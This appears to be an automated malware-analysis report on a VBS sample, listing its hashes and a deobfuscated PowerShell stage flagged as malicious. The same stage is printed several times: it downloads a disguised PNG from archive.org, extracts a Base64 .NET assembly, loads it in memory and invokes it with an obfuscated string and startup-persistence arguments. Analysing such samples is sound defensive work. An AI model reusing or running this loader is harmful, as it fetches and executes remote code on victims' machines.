|
Hash | Hash Value |
|---|---|
| MD5 | 56bef4d9f0775a407359835a12db9d18
|
| Sha1 | 59299989e98ce2c9123fe1959ed3530db72780ac
|
| Sha256 | ac4f52f2a9cd30338e5a41ed8330255617f8f51899e14e6199c64f4df54f6e34
|
| Sha384 | acdcdfa1d504a7f408542df244f936c475dfe7c783695fa3991cbb7535f56d896be951aba4b55f3c623255cf8f50fb99
|
| Sha512 | 1fd81804a0e1109b8a661d94a38c0358dbea49e96dd05013227514e075737ab0422b2a6a482851f3f00d14e8c678253e8081a40d8aa1d42eeb09d5c4eacacc58
|
| SSDeep | 768:WFmxPh1BETehHDKGXBavzooGaQ7G07XQAtK+Z+bZ4Z8ZdZ9ZpOYiao:WFzTehHeGXDt5XQuKa5YNo
|
| TLSH | 9C8387E2BC521C0A5803F42F88F479DEB546DDB7F2B6FC70910904594EAE6859EA3C6C
|
|
Name0 | Value |
|---|---|
| URLs in VB Code - #1 | http://www.ostrosoft.com/smtp.html |
| Deobfuscated PowerShell | Invoke-Expression |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250821/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=YCM3IGMyYGNkFWZ5UGNiZmYilDNjhjN 2gjNkRTNwUTN5QmY0M2N0IzMkVjN1UGMxMGM3QmMlFGMwcjZwQTOhljM90GamAjYzQGOhhjN9MXa mAzM1ITYhhjN9gXZ/QHe05ichNXYw9VYyFGcfN3bpNWam90LyEjM2UDN0AzN1IjM5QTN4ADNx8SM ycDO1gzNyUDO5ATM4MzN4ETMvMHduVWboNWY0RXYv02bj5CcwFGZy92YzlGZu4GZj9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "AppLaunch", "", "AppLaunch", "", "", "", "Name_File", "vbs", "1", "", "", "0", "startup_onstart") } )) |
| Deobfuscated PowerShell | Invoke-Expression |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250821/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=YCM3IGMyYGNkFWZ5UGNiZmYilDNjhjN 2gjNkRTNwUTN5QmY0M2N0IzMkVjN1UGMxMGM3QmMlFGMwcjZwQTOhljM90GamAjYzQGOhhjN9MXa mAzM1ITYhhjN9gXZ/QHe05ichNXYw9VYyFGcfN3bpNWam90LyEjM2UDN0AzN1IjM5QTN4ADNx8SM ycDO1gzNyUDO5ATM4MzN4ETMvMHduVWboNWY0RXYv02bj5CcwFGZy92YzlGZu4GZj9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "AppLaunch", "", "AppLaunch", "", "", "", "Name_File", "vbs", "1", "", "", "0", "startup_onstart") } )) |
| Deobfuscated PowerShell | Invoke-Expression |
|
Name0 | Value | Location |
|---|---|---|
| URLs in VB Code - #1 | http://www.ostrosoft.com/smtp.html |
56bef4d9f0775a407359835a12db9d18 |
| Deobfuscated PowerShell | Invoke-Expression Malicious |
56bef4d9f0775a407359835a12db9d18 > 56bef4d9f0775a407359835a12db9d18.deobfuscated.vbs > [Command #0] > [PowerShell Command] |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250821/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=YCM3IGMyYGNkFWZ5UGNiZmYilDNjhjN 2gjNkRTNwUTN5QmY0M2N0IzMkVjN1UGMxMGM3QmMlFGMwcjZwQTOhljM90GamAjYzQGOhhjN9MXa mAzM1ITYhhjN9gXZ/QHe05ichNXYw9VYyFGcfN3bpNWam90LyEjM2UDN0AzN1IjM5QTN4ADNx8SM ycDO1gzNyUDO5ATM4MzN4ETMvMHduVWboNWY0RXYv02bj5CcwFGZy92YzlGZu4GZj9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "AppLaunch", "", "AppLaunch", "", "", "", "Name_File", "vbs", "1", "", "", "0", "startup_onstart") } )) Malicious |
56bef4d9f0775a407359835a12db9d18 > 56bef4d9f0775a407359835a12db9d18.deobfuscated.vbs > [Command #0] > [Base64-Block] |
| Deobfuscated PowerShell | Invoke-Expression Malicious |
56bef4d9f0775a407359835a12db9d18 > 56bef4d9f0775a407359835a12db9d18.deobfuscated.vbs > [Command #0] > [PowerShell Command] > [Deobfuscated PS] |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250821/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=YCM3IGMyYGNkFWZ5UGNiZmYilDNjhjN 2gjNkRTNwUTN5QmY0M2N0IzMkVjN1UGMxMGM3QmMlFGMwcjZwQTOhljM90GamAjYzQGOhhjN9MXa mAzM1ITYhhjN9gXZ/QHe05ichNXYw9VYyFGcfN3bpNWam90LyEjM2UDN0AzN1IjM5QTN4ADNx8SM ycDO1gzNyUDO5ATM4MzN4ETMvMHduVWboNWY0RXYv02bj5CcwFGZy92YzlGZu4GZj9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "AppLaunch", "", "AppLaunch", "", "", "", "Name_File", "vbs", "1", "", "", "0", "startup_onstart") } )) Malicious |
56bef4d9f0775a407359835a12db9d18 > 56bef4d9f0775a407359835a12db9d18.deobfuscated.vbs > [Command #0] > [Base64-Block] > [Deobfuscated PS] |
| Deobfuscated PowerShell | Invoke-Expression Malicious |
56bef4d9f0775a407359835a12db9d18 > 56bef4d9f0775a407359835a12db9d18.deobfuscated.vbs > [Command #0] > [Deobfuscated PS] > [PowerShell Command] |